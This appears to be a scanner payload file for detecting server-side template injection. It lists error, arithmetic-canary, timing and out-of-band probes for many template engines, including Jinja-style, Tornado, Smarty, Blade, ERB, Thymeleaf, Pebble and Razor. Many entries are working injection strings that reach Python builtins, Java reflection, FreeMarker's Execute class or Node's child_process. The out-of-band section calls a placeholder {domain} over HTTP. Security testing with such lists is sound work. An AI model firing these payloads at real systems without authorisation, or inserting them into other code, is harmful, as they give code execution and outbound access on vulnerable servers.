##SSTI - Error-Based##
${{<%[%'"}}%\
{{invalid}}
${invalid}
<%= invalid %>
{%invalid%}
{% invalid %}
{{.invalid}}
${T(invalid)}
{{constructor.constructor("invalid")()}}
${invalid.class}
{{invalid|safe}}
{%- invalid -%}
${{<%[%'"}}%\}}
${${{<%[%'"}}%\}
{{''.__class__.__mro__[2].__subclasses__()[999]}}
<%= undefined_method_xyz %>
${T(java.lang.Runtime).invalidMethod()}
{{range.invalid}}
{{7*'a]}}
${"invalid"?no_such_builtin}
{%%}
{{%}}
<%=%>
##SSTI - Math-Based (Canary: 1337)##
{{7*191}}
${7*191}
<%= 7*191 %>
${{7*191}}
{{7*191}}${7*191}<%= 7*191 %>${{7*191}}#{7*191}
<#assign x=7*191>${x}
${T(java.lang.Math).addExact(1330,7)}
{{7*191}}//
'}}{{7*191}}//
"}}{{7*191}}//
}}{{7*191}}
{{7*191}}{{7*191}}
${7*191}${{7*191}}
<%= 7 * 191 %>
{{(7)*191}}
${{(7)*(191)}}
{{7*191|safe}}
{%set x=7*191%}{{x}}
${(7*191)?c}
{{=7*191}}
{{7*191}}${{7*191}}<%= 7*191 %>#{7*191}${7*191}
{{config.__class__.__init__.__globals__['__builtins__']['eval']('7*191')}}
${(7*191)}
<%=7*191%>
{{{7*191}}}
{{7*191}}{%comment%}{%endcomment%}
a]}}{{7*191}}
{{7*191}}/*
*/{{7*191}}
<%= (7)*(191) %>
${(7)*(191)}
${{7*191}}//
a]${7*191}
{{7*191}}${{<%[%'7*191}}%\
{{range.Repeat 1337}}A{{end}}
##SSTI - Timing-Based##
{{config.__class__.__init__.__globals__['__builtins__']['__import__']('time').sleep(5)}}
{{lipsum.__globals__['__builtins__']['__import__']('time').sleep(5)}}
{{cycler.__init__.__globals__['__builtins__']['__import__']('time').sleep(5)}}
{{joiner.__init__.__globals__['__builtins__']['__import__']('time').sleep(5)}}
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('time').sleep(5)}}
{{request.application.__globals__.__builtins__.__import__('time').sleep(5)}}
{{self._TemplateReference__context.cycler.__init__.__globals__['__builtins__']['__import__']('time').sleep(5)}}
${__import__("time").sleep(5)}
<%import time;time.sleep(5)%>
<%= sleep(5) %>
<%= Kernel.sleep(5) %>
{{['5']|filter('sleep')}}
{{['5']|map('sleep')}}
${T(java.lang.Thread).sleep(5000)}
${"freemarker.template.utility.Execute"?new()("sleep 5")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("sleep 5")}
<% var t=Date.now();while(Date.now()-t<5000){} %>
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('child_process').execSync('sleep 5');"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}
##SSTI - OOB##
{{config.__class__.__init__.__globals__['__builtins__']['__import__']('urllib.request').request.urlopen('http://{domain}/ssti')}}
{{lipsum.__globals__['__builtins__']['__import__']('urllib.request').request.urlopen('http://{domain}/ssti')}}
{{cycler.__init__.__globals__['__builtins__']['__import__']('urllib.request').request.urlopen('http://{domain}/ssti')}}
{{joiner.__init__.__globals__['__builtins__']['__import__']('urllib.request').request.urlopen('http://{domain}/ssti')}}
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('urllib.request').request.urlopen('http://{domain}/ssti')}}
{{request.application.__globals__.__builtins__.__import__('urllib.request').request.urlopen('http://{domain}/ssti')}}
{{self._TemplateReference__context.cycler.__init__.__globals__['__builtins__']['__import__']('urllib.request').request.urlopen('http://{domain}/ssti')}}
${__import__('urllib.request').request.urlopen('http://{domain}/ssti')}
<%= require('net/http');Net::HTTP.get(URI('http://{domain}/ssti')) %>
<%= require('open-uri');URI.open('http://{domain}/ssti').read %>
{{['http://{domain}/ssti']|filter('file_get_contents')}}
{{['http://{domain}/ssti']|map('file_get_contents')}}
${T(java.net.URL).new('http://{domain}/ssti').openStream()}
${"java.net.URL"?new("http://{domain}/ssti").openStream()}
<#assign url="java.net.URL"?new("http://{domain}/ssti")>${url.openStream()}
<% require('http').get('http://{domain}/ssti',function(r){}); %>
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('http').get('http://{domain}/ssti');"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}
##Tornado (Python) - Math##
{{7*191}}
{{7*191}}
##Tornado (Python) - Error##
{{invalid.__class__}}
{{[].__class__.__bases__[99]}}
##Tornado (Python) - Timing##
{%import time%}{{time.sleep(5)}}
##Tornado (Python) - OOB##
{%import urllib.request%}{{urllib.request.urlopen('http://{domain}/tornado')}}
{%import urllib.request%}{{urllib.request.urlopen('http://{domain}/tornado').read()}}
##Nunjucks (Node) - Math##
{{7*191}}
##Nunjucks (Node) - Error##
{{invalid}}
##Nunjucks (Node) - Timing##
{{range(99999999)|join}}
##Pug (Node) - Math##
=7*191
#{7*191}
##Pug (Node) - Error##
=undefined.property.deep
##Mustache (Logic-less) - Error##
{{#invalid}}{{/invalid}}
{{> invalid_partial}}
##Smarty (PHP) - Math##
{7*191}
{math equation="7*191"}
{math equation="7 * 191"}
##Smarty (PHP) - Error##
{invalid_function()}
##Smarty (PHP) - Timing##
{php}sleep(5);{/php}
##Smarty (PHP) - OOB##
{fetch file="http://{domain}/smarty"}
{fetch file="http://{domain}/smarty" assign="x"}
##Blade (PHP/Laravel) - Math##
{{7*191}}
{!!7*191!!}
##Blade (PHP/Laravel) - Error##
{{invalid}}
{{$undefined->method()}}
##Blade (PHP/Laravel) - Timing##
@php sleep(5); @endphp
##Blade (PHP/Laravel) - OOB##
@php file_get_contents('http://{domain}/blade') @endphp
@php fopen('http://{domain}/blade','r') @endphp
##ERB (Ruby) - Math##
<%=7*191%>
<%= 7 * 191 %>
##ERB (Ruby) - Error##
<%=invalid%>
<%=raise 'ssti_error'%>
##ERB (Ruby) - Timing##
<%=sleep(5)%>
<%=sleep 5%>
##ERB (Ruby) - OOB##
<%=require 'net/http';Net::HTTP.get(URI('http://{domain}/erb'))%>
<%=require 'open-uri';URI.open('http://{domain}/erb').read%>
##Slim (Ruby) - Math##
=7*191
= 7 * 191
##Slim (Ruby) - Error##
=invalid_var
=raise 'ssti_error'
##Slim (Ruby) - Timing##
=sleep(5)
##Slim (Ruby) - OOB##
=require 'net/http';Net::HTTP.get(URI('http://{domain}/slim'))
##Haml (Ruby) - Math##
=7*191
= 7 * 191
##Haml (Ruby) - Error##
=invalid_var
=raise 'ssti_error'
##Haml (Ruby) - Timing##
=sleep(5)
##Haml (Ruby) - OOB##
=require 'net/http';Net::HTTP.get(URI('http://{domain}/haml'))
##Liquid (Ruby/Shopify) - Error##
{{invalid}}
{{invalid | no_such_filter}}
##Thymeleaf (Java) - Math##
[[${7*191}]]
[[${T(java.lang.Math).abs(-1337)}]]
*{7*191}
##Thymeleaf (Java) - Error##
[[${T(invalid).method()}]]
[[${T(java.lang.Runtime).exec('invalid')}]]
##Thymeleaf (Java) - Timing##
[[${T(java.lang.Thread).sleep(5000)}]]
##Thymeleaf (Java) - OOB##
[[${T(java.net.URL).new('http://{domain}/thymeleaf').openStream()}]]
[[${new java.util.Scanner(T(java.net.URL).new('http://{domain}/thymeleaf').openStream()).next()}]]
##Pebble (Java) - Math##
{{7*191}}
{{"".class.forName("java.lang.Math").getMethod("abs",long.class).invoke(null,-1337)}}
##Pebble (Java) - Error##
{{invalid}}
##Pebble (Java) - Timing##
{{"".getClass().forName("java.lang.Thread").getMethod("sleep",long.class).invoke(null,5000)}}
##Pebble (Java) - OOB##
{{"".getClass().forName("java.net.URL").getConstructor("".getClass()).newInstance("http://{domain}/pebble").openStream()}}
##Razor (C#/.NET) - Math##
@(7*191)
@(System.Math.Abs(-1337))
##Razor (C#/.NET) - Error##
@(invalid)
@(throw new System.Exception("ssti_error"))
##Razor (C#/.NET) - Timing##
@{System.Threading.Thread.Sleep(5000);}
##Razor (C#/.NET) - OOB##
@{new System.Net.WebClient().DownloadString("http://{domain}/razor");}
@{new System.Net.Http.HttpClient().GetStringAsync("http://{domain}/razor").Result;}
##Go text/template - Math##
{{printf "%d" 1337}}
{{html 1337}}
##Go text/template - Error##
{{.Invalid}}
{{template "nonexistent"}}
